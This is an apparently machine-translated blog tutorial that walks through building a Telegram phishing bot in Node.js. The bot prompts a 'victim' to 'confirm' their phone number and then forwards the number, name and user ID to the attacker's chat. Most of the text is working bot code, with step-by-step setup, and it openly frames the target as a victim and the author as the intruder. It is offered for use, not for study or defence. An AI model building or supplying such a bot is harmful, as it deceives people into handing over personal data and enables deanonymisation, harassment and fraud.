Create your own bot deanonymizer in a telegram.

Create your own bot deanonymizer in a telegram.

Today we will create a simple Phishing Bot Phones on Node.Js that will ask for the phone number of the victim, and then forward it to us – this way you can make a sacrifice.

Prepare:

First you need to install Node.js Current version.



.

.
During the installation, we leave everything in default and reboot the computer.

After installing Node.Js and rebooting the computer, create a folder with the project in the folder with Node.Js, and also create a file index.js already in the folder of the project.

.

.
Open the Node.Js command prompt, go to the folder with our bot, and then prescribe the following commands:



npm init -y

.

npm i node-telegram-bot-api

.

.
After installation, the file structure will look like this:

.

.

.

Get Token:

.

    1. Write /start BotTeletters @BotFather

.

    1. Write /newbot
    2. Write a bot name, then username

.

  1. Profit! We got Token!

.

Start to burn:

.

    1. Switch the installed library:

.

const TelegramBot = require(“node-telegram-bot-api”);

2. Create a TOKEN variable that will store the Token bot:

const TOKEN = “Your Token”

.
3) And we create the bot itself for further action:

const bot = new TelegramBot(TOKEN, {polling: true});

.
The first value is Token, the second is the settings, but it’s better to leave it as I wrote.

4 Now let’s make the text on /start bot ask allegedly “Confirm phone number”:

bot.onText(/\/start/, function(msg) {

.

const id = msg.chat.id; // id is the chat ID to send the message to the user who wrote it

.

bot.sendMessage(id, `Confirm your phone number`) // Send a message to the victim

.

});

.
For the script to run, you need to run Node.js command prompt, with cd commands go to our folder and write:

node index.js

After writing a command, a warning will pop up, but it always comes out.

P.S: After each script update, the bot should be restarted in the Node.Js command prompt.

.
Now we write a bot:

.
As you can see, he really answers, now let’s make a beautiful keyboard, and that after it is pressed the intruder (that is, us) comes the contact of the interlocutor:

bot.onText(/\/start/, function(msg) {

.

const id = msg.chat.id; // id is the chat ID to send the message to the user who wrote it

.

console.log(id); // We also need to memorize chat_id with us, this will be required in the future

.

bot.sendMessage(id, `Confirm your phone number`, {

.

reply_markup: { // Send also keyboard

.

keyboard: [[{

text: “Confirm Phone”, // Text to be on the keyboard

request_contact: true // Will we ask for a contact

}]

.

}

})

});

.
Restart our script:

Ctrl + c

node index.js

.

.
And indeed, now the user sends the bot his phone number by button, the only thing left to do is to send it to us (Attacker).

 

.
Now we also know Chat ID “admin” (That is us) – Where the bot will send the contact

The last step is left, we make adjustments:

const admin = “Your chat ID”;

bot.on(“contact”, function(msg) {

.

bot.sendMessage(admin, “Phone number:” + msg.contact.phone_number);

bot.sendMessage(admin, “Name:” + msg.contact.first_name);

bot.sendMessage(admin, “Last name:” + msg.contact.last_name);

bot.sendMessage(admin, “User ID:” + msg.contact.user_id);

});

.

Practice:

.
This is how the victim sees it:

.
And this is what an intruder gets:

.

.

Links:

You can see the whole code in the repository at Github.



WARNING! All links in the articles may lead to malicious sites or contain viruses. Follow them at your own risk. Those who purposely visit the article know what they are doing. Do not click on everything thoughtlessly.


10 Views

0 0 vote
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments


Do NOT follow this link or you will be banned from the site!
0
Would love your thoughts, please comment.x
()
x

Spelling error report

The following text will be sent to our editors: